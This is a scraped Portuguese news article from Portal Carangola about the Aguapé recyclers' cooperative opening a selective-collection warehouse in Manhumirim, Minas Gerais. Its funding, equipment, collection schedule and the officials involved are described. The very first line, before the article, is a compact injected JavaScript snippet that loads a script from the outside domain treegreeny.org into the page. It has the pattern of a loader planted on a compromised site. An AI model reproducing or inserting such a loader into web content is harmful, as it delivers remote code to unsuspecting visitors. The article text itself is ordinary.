;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhumirim-Cooperativa Aguapé Inaugura Galpão da Coleta Seletiva - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhumirim-Cooperativa Aguapé Inaugura Galpão da Coleta Seletiva

A Cooperativa Aguapé, uma cooperativa formada por catadores de material reciclável de Manhumirim, inaugurou sábado (02) o galpão da coleta seletiva. O evento marcou também o início da coleta seletiva em oito bairros de Manhumirim.
A cooperativa atua em Manhumirim desde 2007 prestando serviço à Prefeitura na Usina de Triagem e Compostagem. Em 2010, participou de um edital do Governo Federal, através da FUNASA e foi contemplada com recursos para estruturação do galpão da coleta seletiva, num montante de R$ 200.000,00. Com o investimento, a Cooperativa adquiriu um caminhão para realizar a coleta seletiva e maquinários para o galpão como prensa, balança, elevador de cargas, triturador de vidro, triturador de papel e mesas de triagem.
Atualmente a cooperativa gera trabalho para vinte catadores que contam hoje com renda para suas famílias, amparo da previdência social entre outros benefícios alcançados pelo trabalho coletivo. Com a coleta seletiva o grupo espera melhorar ainda mais a renda com os recicláveis.
A solenidade de abertura do galpão da coleta seletiva
Com a presença de autoridades e familiares dos catadores, o evento aconteceu no sábado às 11 horas no galpão localizado na Rua Rafael Vicente Amil Nº 15 – centro (próximo à rodoviária de Manhumirim). Na ocasião, os presentes tiveram a oportunidade de ver quantas pessoas são beneficiadas diretamente com a reciclagem em Manhumirim.
A coleta seletiva
Após minucioso diagnóstico para implantação da coleta seletiva feito pela Prefeitura e com as condições para iniciar os trabalhos, a cooperativa iniciará na próxima terça-feira (05/06): Dia do Meio Ambiente, a coleta seletiva que atingirá inicialmente oito bairros de Manhumirim.  O caminhão da cooperativa passará nos bairros e centro em dois dias da semana para cada bairro recolhendo apenas os recicláveis. No dia em que houver coleta seletiva, o caminhão de lixo não passará no bairro.
Espera-se que a população se habitue à nova prática e colabore com este importante trabalho ambiental.
Destaque
Mais uma vez Manhumirm se destaca em relação a outras cidades de Minas e até mesmo do Brasil. São pouquíssimos os municípios brasileiros que tem coleta seletiva e muitos ainda convivem com o problema dos lixões. Manhumirim conseguiu acabar com o lixão através da implantação da usina de triagem e compostagem e agora dá mais um passo com a coleta seletiva. E o principal destaque é que tudo isso aconteceu com a inclusão produtiva dos catadores.
Na inauguração oficial do galpão foi lembrado pelos presentes o apoio total dos três poderes constituídos. Executivo: Grande apoio do prefeito Ronaldo Lopes, que investiu fortemente nas questões relacionadas ao meio ambiente, construindo a Usina de Triagem e Compostagem de Lixo e dando total apoio, assinando contrato de parceria com a cooperativa. Legislativo e Judiciário também têm feito suas partes.
Grandes incentivadores:
O ex secretário de ação social de Manhumirim, José Weber acreditou desde o início no projeto e é um dos grandes responsáveis pelo sucesso alcançado. Flávia Dias, Bióloga da prefeitura, assim como José Weber e a presidente da cooperativa aguapé, Rosangela Souza(Tica), sonharam com os objetivos hoje alcançados. Tudo graças a um trabalho persistente e incansável.
Contra a incineração
Autoridades presentes na cerimônia de inauguração do galpão da coleta seletiva em Manhumirim destacaram a grande importância da reciclagem e se posicionaram altamente contra a implantação por parte de alguns municípios de incineradores que transformariam o que hoje gera emprego e renda em cinza. “Se Manhumirim com 21 mil habitantes, hoje gera emprego e renda para cerca de vinte famílias, imagina cidades com 80, 100, 200 mil habitantes. Com certeza muito mais seriam os beneficiados”  Destacou José Weber Pereira”.


Valdir Vieira – Assessoria de Comunicação – Prefeitura de Manhumirim


Ofertas clique aqui


[vitrine]cameras[/vitrine]

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.